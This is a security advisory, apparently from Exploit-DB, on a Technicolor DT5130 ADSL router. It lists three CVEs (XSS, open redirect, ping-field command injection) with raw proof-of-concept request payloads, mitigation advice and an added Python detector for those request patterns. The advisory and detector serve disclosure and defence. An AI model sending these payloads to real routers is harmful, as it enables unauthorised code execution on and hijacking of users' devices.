vendor: Wireless N ADSL 2/2+ Modem Router
by: Ewerson Guimaraes (Crash)
CVSS: 8,8 HIGH
Unauthenticated XSS, Arbitrary URL Redirect and Command Injection
CWE: 79, 601, 78
Product Name: Wireless N ADSL 2/2+ Modem Router
Affected Version From: V2.05.C29GV
Affected Version To: V2.05.C29GV
Patch Exists: YES
Related CVE: CVE-2014-9142, CVE-2014-9143, CVE-2014-9144
CPE: h:technicolor:dt5130
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

Unauthenticated XSS, Arbitrary URL Redirect and Command Injection in ping field

The Technicolor DT5130 Wireless N ADSL 2/2+ Modem Router with firmware version V2.05.C29GV is vulnerable to unauthenticated XSS, arbitrary URL redirect and command injection. In each case the attacker sends a specially crafted request to the router. A request containing malicious JavaScript code causes that code to be executed in the context of the user's browser. A request containing a malicious URL causes the user to be redirected to a malicious website. A request containing a malicious command in the ping field causes that command to be executed in the context of the router.

Mitigation:

Users should update their router to the latest version of the firmware. Additionally, users should ensure that they are using strong passwords for their router.

Exploit-DB raw data:

Product: Wireless N ADSL 2/2+ Modem Router
Firmware Version : V2.05.C29GV
Modem Type : ADSL2+ Router
Modem Vendor : Technicolor
Model: DT5130

Bugs:
1- Unauth XSS - CVE-2014-9142
user=teste&password=teste&
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login

2- Arbitrary URL redirect - CVE-2014-9143
failrefer=http://blog.dclabs.com.br&login=Login&password=pass&refer=/index.html&user=1&userlevel=15

3- Command Injection in ping field - CVE-2014-9144
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE


-- 
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs / Ibliss  Security Team
www.dclabs.com.br / www.ibliss.com.br
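
Added example, not part of the original advisory or the Exploit-DB entry: a Python check that a proxy or log-review job in front of the device could run over POST bodies to flag the three request patterns listed under "Bugs". The parameter names come from the requests above; the allow-list rules, the function names and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameter names as they appear in the requests quoted in the advisory.
REDIRECT_PARAMS = {"refer", "failrefer"}
PING_PARAM = "setobject_ip"
MARKUP = re.compile(r"[<>\"']")  # characters that can open HTML or script context
# Assumed allow-list for a ping target: host name or IPv4 characters only.
HOST_OK = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def is_local_path(value: str) -> bool:
    """True for an empty value or a path on the device itself ('/x', not '//x' or '/\\x')."""
    return value == "" or (value.startswith("/") and not value.startswith(("//", "/\\")))


def classify(body: str) -> list[str]:
    """Return the sorted CVE ids whose request pattern appears in a form-encoded body."""
    hits = set()
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in REDIRECT_PARAMS:
            if MARKUP.search(value):
                hits.add("CVE-2014-9142")  # markup carried in refer/failrefer
            if not is_local_path(value.strip()):
                hits.add("CVE-2014-9143")  # redirect target leaves the device
        elif name == PING_PARAM:
            # Decoded value has the form "<oid>=<host>"; only <host> is validated.
            _, _, host = value.partition("=")
            if not HOST_OK.fullmatch(host):
                hits.add("CVE-2014-9144")  # ping target is not a plain host
    return sorted(hits)


# Constructed sample bodies (not captured traffic); example.test and 192.0.2.1 are reserved names.
OID = "s1.3.6.1.4.1.283.1000.2.1.6.4.1.0"
SAMPLES = {
    "normal login": "user=a&password=b&userlevel=15&refer=%2Findex.html&failrefer=%2Findex.html",
    "markup in failrefer": "failrefer=/basicauth.cgi?index.html?failrefer=%3Cscript%3Ealert(1)%3C/script%3E",
    "external failrefer": "failrefer=http%3A%2F%2Fexample.test&login=Login&refer=/index.html",
    "normal ping": f"setobject_ip={OID}%3D192.0.2.1",
    "metacharacters in ping": f"setobject_ip={OID}%3Dexample.test%7C%60id%60",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:24} {classify(body) or 'clean'}")
```
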